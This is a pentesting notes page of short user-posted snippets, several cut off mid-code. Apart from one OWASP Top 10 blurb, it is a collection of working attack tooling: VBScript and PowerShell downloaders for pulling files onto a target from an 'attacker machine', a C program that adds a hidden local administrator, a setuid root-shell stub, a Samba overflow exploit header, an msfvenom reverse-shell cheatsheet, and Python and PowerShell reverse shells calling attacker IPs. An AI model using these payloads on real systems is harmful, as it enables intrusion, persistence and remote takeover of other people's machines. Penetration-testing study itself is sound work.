Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-27 11:50:14

Recently (at the end of 2017), OWASP updated its Top 10 list. For the unfamiliar, let me briefly explain what that means: the industry standard of basic-web-security education has altered. Though it’s never been a complete security education, the OWASP Top Ten is where almost all standards for web-developer security education begin. So when it ch...


Score: 0


echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTI...


Score: 0


Usage: cscript wget.vbs http://[URL (including file)] [filename to save to]

On attacker machine:
copy file to transfer to: **/var/www**
start apache: **service apache2 start**



echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT...


Score: 0


Usage: echo "" | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Make sure to change the values for $url and $file before sending the commands

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[---URL (with filepath)-...


Score: 0


#include <stdlib.h>
int main()
{
int i;
int j;
i = system("net user [---username---] [---password---] /add");
j = system("net localgroup administrators [---username---] /add");
return 0;
}
...


Score: 0


/*source: http://www.securityfocus.com/bid/7294/info

A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.

Successful expl...


Score: 0


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
setgid(0);
system( "/bin/sh -i" );
}
...


Score: 0


## Reverse Shell with Msfvenom - Cheatsheet

### List payloads

```
msfvenom -l
```

Or

```
msfvenom --list payloads
```

### Generate a PHP payload

```
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
```

### Generate a Windows payload

##### ...


Score: 0


# Reverse shell one-liner python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
...


Score: 0


$client = New-Object System.Net.Sockets.TCPClient("192.168.30.165",4444);
$stream = $client.GetStream();

$greeting = "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($greeting);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();
[byte[]]$bytes = 0..255|%{0};


while(($i = ...


Score: 0